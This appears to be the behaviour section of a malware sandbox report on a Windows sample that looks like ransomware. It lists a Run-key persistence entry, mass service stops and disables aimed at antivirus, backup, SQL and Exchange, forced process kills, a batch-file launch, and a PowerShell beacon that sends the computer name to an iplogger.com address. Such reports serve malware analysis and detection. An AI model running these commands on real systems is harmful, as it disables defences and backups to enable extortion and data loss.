Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'DisplayIntervalValue' = '<Full path to file>'
- '<SYSTEM32>\net.exe' stop avpsus /y
- '<SYSTEM32>\taskkill.exe' /T /IM mysql_mt.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM thunderbird.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM sqbcoreservice.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM xfssvccon.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM isqlplussvc.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM mysqld.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM firefoxconfig.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM msaccess.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM winword.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM CCMonitor.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM thebat64.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM tbirdconfig.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM sqlagent.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM outlook.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM nbrb.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM nbnos.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM nbpem.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM nbsl.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM bpbkar32.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM bpbrm.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM sshd.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM sgrmbroker.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM onenote.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM mysql_nt.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM ocssd.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM sqlservr.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM powerpnt.exe /F
- '<SYSTEM32>\net.exe' stop mfewc /y
- '<SYSTEM32>\net.exe' stop "BMR Boot Service" /y
- '<SYSTEM32>\net.exe' stop "NetBackup BMR MTFTP Service" /y
- '<SYSTEM32>\net.exe' stop samss /y
- '<SYSTEM32>\net.exe' stop MySQL /y
- '<SYSTEM32>\taskkill.exe' /T /IM mspub.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM mydesktopqos.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM mydesktopservice.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM sqlbrowser.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM mysql_opt.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM WavesSvc64.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM dbeng50.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM ocomm.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM thebat.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM ocautoupds.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM agntsvc.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM visio.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM msftesql.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM synctime.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM dbsnmp.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM oracle.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM wordpad.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM sqlwriter.exe /F
- '<SYSTEM32>\net.exe' stop McAfeeDLPAgentService /y
- '<SYSTEM32>\taskkill.exe' /T /IM encsvc.exe /F
- '<SYSTEM32>\taskkill.exe' /T /IM Delega.exe /F
- %TEMP%\costura\d5722b543f1b9201467ad3ffef4c8dd0\64\sqlite.interop.dll
- %TEMP%\st.bat
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- http://ya##o.com/
- DNS ASK ip###ger.com
- DNS ASK microsoft.com
- DNS ASK ya##o.com
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\st.bat""
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeMailboxReplication
- '<SYSTEM32>\sc.exe' stop MSExchangeMailboxReplication
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeRepl
- '<SYSTEM32>\sc.exe' stop MSExchangeRepl
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeRPC
- '<SYSTEM32>\sc.exe' stop MSExchangeRPC
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeServiceHost
- '<SYSTEM32>\sc.exe' stop MSExchangeIS
- '<SYSTEM32>\sc.exe' stop MSExchangeServiceHost
- '<SYSTEM32>\sc.exe' stop MSExchangeMailboxAssistants
- '<SYSTEM32>\sc.exe' stop MSExchangeSubmission
- '<SYSTEM32>\sc.exe' stop MSExchangeThrottling
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeTransport
- '<SYSTEM32>\sc.exe' stop MSExchangeTransport
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeTransportLogSearch
- '<SYSTEM32>\sc.exe' stop MSExchangeTransportLogSearch
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeUM
- '<SYSTEM32>\sc.exe' stop MSExchangeUM
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeSubmission
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeUMCR
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeThrottling
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeMailboxAssistants
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeIS
- '<SYSTEM32>\sc.exe' stop MSExchangeHM
- '<SYSTEM32>\sc.exe' config MSExchangeUMCR start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config SearchExchangeTracing
- '<SYSTEM32>\sc.exe' config SearchExchangeTracing
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeADTopology
- '<SYSTEM32>\sc.exe' stop MSExchangeADTopology
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeAntispamUpdate
- '<SYSTEM32>\sc.exe' stop MSExchangeAntispamUpdate
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeDagMgmt
- '<SYSTEM32>\sc.exe' config MSExchangeUM start= disabled
- '<SYSTEM32>\sc.exe' stop MSExchangeDagMgmt
- '<SYSTEM32>\sc.exe' stop MSExchangeDelivery
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeDiagnostics
- '<SYSTEM32>\sc.exe' stop MSExchangeDiagnostics
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeEdgeSync
- '<SYSTEM32>\sc.exe' stop MSExchangeEdgeSync
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeFastSearch
- '<SYSTEM32>\sc.exe' stop MSExchangeFastSearch
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeFrontEndTransport
- '<SYSTEM32>\sc.exe' stop MSExchangeFrontEndTransport
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeDelivery
- '<SYSTEM32>\cmd.exe' /c sc stop MSExchangeHM
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeUM start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeUMCR start= disabled
- '<SYSTEM32>\sc.exe' stop MSExchangeUMCR
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM mydesktopqos.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM xfssvccon.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM isqlplussvc.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM mysqld.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM firefoxconfig.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM msaccess.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM winword.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM CCMonitor.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM tbirdconfig.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM thunderbird.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM sqbcoreservice.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM dbeng50.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM nbrb.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM nbnos.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM nbpem.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM nbsl.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM bpbkar32.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM bpbrm.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM sshd.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM sgrmbroker.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM sqlagent.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM outlook.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM mysql_mt.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM onenote.exe /F
- '<SYSTEM32>\sc.exe' config MSExchangeEdgeSync start= disabled
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM mydesktopservice.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM sqlbrowser.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM mysql_opt.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM ocomm.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM thebat64.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM encsvc.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM thebat.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM ocautoupds.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM agntsvc.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM visio.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM msftesql.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM synctime.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM dbsnmp.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM oracle.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM wordpad.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM sqlwriter.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM powerpnt.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM sqlservr.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM ocssd.exe /F
- '<SYSTEM32>\cmd.exe' /c sc stop SearchExchangeTracing
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM mspub.exe /F
- '<SYSTEM32>\sc.exe' stop SearchExchangeTracing
- '<SYSTEM32>\sc.exe' config MSExchangeTransportLogSearch start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeTransportLogSearch start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeTransport start= disabled
- '<SYSTEM32>\sc.exe' stop SQLTELEMETRY$ECWDB2
- '<SYSTEM32>\cmd.exe' /c sc stop SQLWriter
- '<SYSTEM32>\sc.exe' stop SQLWriter
- '<SYSTEM32>\cmd.exe' /c sc stop SstpSvc
- '<SYSTEM32>\sc.exe' stop SstpSvc
- '<SYSTEM32>\cmd.exe' /c sc config MSSQLSERVER start= disabled
- '<SYSTEM32>\sc.exe' config MSSQLSERVER start= disabled
- '<SYSTEM32>\cmd.exe' /c sc stop SQLTELEMETRY
- '<SYSTEM32>\cmd.exe' /c sc config "SQL Server Agent (MSSQLSERVER)" start= disabled
- '<SYSTEM32>\cmd.exe' /c sc stop SQLTELEMETRY$ECWDB2
- '<SYSTEM32>\cmd.exe' /c sc config "SQL Server Browser" start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config "SQL Server Analysis services (MSSQLSERVER)" start= disabled
- '<SYSTEM32>\sc.exe' config "SQL Server Analysis services (MSSQLSERVER)" start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config "SQL Server Reporting Services (MSSQLSERVER)" start= disabled
- '<SYSTEM32>\sc.exe' config "SQL Server Reporting Services (MSSQLSERVER)" start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config "SQL Server Distributed Replay Client" start= disabled
- '<SYSTEM32>\sc.exe' config "SQL Server Distributed Replay Client" start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config "SQL Server Distributed Replay Controller" start= disabled
- '<SYSTEM32>\sc.exe' config "SQL Server Agent (MSSQLSERVER)" start= disabled
- '<SYSTEM32>\sc.exe' config SstpSvc start= disabled
- '<SYSTEM32>\sc.exe' config "SQL Server Browser" start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config SstpSvc start= disabled
- '<SYSTEM32>\sc.exe' config SQLWriter start= disabled
- '<SYSTEM32>\cmd.exe' /c powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = -join($env:computername,'--->> START');$cli.OpenRead('https://iplogger.com/2fmxJ5').StatusCode"
- '<SYSTEM32>\cmd.exe' /c net stop avpsus /y
- '<SYSTEM32>\net1.exe' stop avpsus /y
- '<SYSTEM32>\cmd.exe' /c net stop McAfeeDLPAgentService /y
- '<SYSTEM32>\net1.exe' stop McAfeeDLPAgentService /y
- '<SYSTEM32>\cmd.exe' /c net stop mfewc /y
- '<SYSTEM32>\net1.exe' stop mfewc /y
- '<SYSTEM32>\cmd.exe' /c net stop "BMR Boot Service" /y
- '<SYSTEM32>\net1.exe' stop "BMR Boot Service" /y
- '<SYSTEM32>\cmd.exe' /c net stop "NetBackup BMR MTFTP Service" /y
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = -join($env:computername,'--->> START');$cli.OpenRead('https://iplogger.com/2fmxJ5').StatusCode"
- '<SYSTEM32>\net1.exe' stop "NetBackup BMR MTFTP Service" /y
- '<SYSTEM32>\net1.exe' stop samss /y
- '<SYSTEM32>\cmd.exe' /c net stop MySQL /y
- '<SYSTEM32>\net1.exe' stop MySQL /y
- '<SYSTEM32>\cmd.exe' /c sc config SQLTELEMETRY start= disabled
- '<SYSTEM32>\sc.exe' config SQLTELEMETRY start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config SQLTELEMETRY$ECWDB2 start= disabled
- '<SYSTEM32>\sc.exe' config SQLTELEMETRY$ECWDB2 start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config SQLWriter start= disabled
- '<SYSTEM32>\sc.exe' config "SQL Server Distributed Replay Controller" start= disabled
- '<SYSTEM32>\cmd.exe' /c net stop samss /y
- '<SYSTEM32>\cmd.exe' /c sc stop MSSQLSERVER
- '<SYSTEM32>\sc.exe' stop SQLTELEMETRY
- '<SYSTEM32>\sc.exe' stop MSSQLSERVER
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeFrontEndTransport start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeHM start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeHM start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeIS start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeIS start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeMailboxAssistants start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeMailboxAssistants start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeMailboxReplication start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeMailboxReplication start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeRepl start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeRepl start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeRPC start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeRPC start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeServiceHost start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeServiceHost start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeSubmission start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeSubmission start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeThrottling start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeThrottling start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeTransport start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeFastSearch start= disabled
- '<SYSTEM32>\cmd.exe' /c sc stop "SQL Server Agent (MSSQLSERVER)"
- '<SYSTEM32>\sc.exe' config MSExchangeFrontEndTransport start= disabled
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM mysql_nt.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM WavesSvc64.exe /F
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeEdgeSync start= disabled
- '<SYSTEM32>\cmd.exe' /c sc stop "SQL Server Browser"
- '<SYSTEM32>\sc.exe' stop "SQL Server Browser"
- '<SYSTEM32>\cmd.exe' /c sc stop "SQL Server Analysis services (MSSQLSERVER)"
- '<SYSTEM32>\sc.exe' stop "SQL Server Analysis services (MSSQLSERVER)"
- '<SYSTEM32>\cmd.exe' /c sc stop "SQL Server Reporting Services (MSSQLSERVER)"
- '<SYSTEM32>\sc.exe' stop "SQL Server Reporting Services (MSSQLSERVER)"
- '<SYSTEM32>\cmd.exe' /c sc stop "SQL Server Distributed Replay Client"
- '<SYSTEM32>\sc.exe' stop "SQL Server Distributed Replay Client"
- '<SYSTEM32>\cmd.exe' /c sc stop "SQL Server Distributed Replay Controller"
- '<SYSTEM32>\sc.exe' stop "SQL Server Agent (MSSQLSERVER)"
- '<SYSTEM32>\sc.exe' stop "SQL Server Distributed Replay Controller"
- '<SYSTEM32>\sc.exe' config MSExchangeADTopology start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeAntispamUpdate start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeAntispamUpdate start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeDagMgmt start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeDagMgmt start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeDelivery start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeDelivery start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeDiagnostics start= disabled
- '<SYSTEM32>\sc.exe' config MSExchangeDiagnostics start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeADTopology start= disabled
- '<SYSTEM32>\cmd.exe' /c sc config MSExchangeFastSearch start= disabled
- '<SYSTEM32>\cmd.exe' /c taskkill /T /IM Delega.exe /F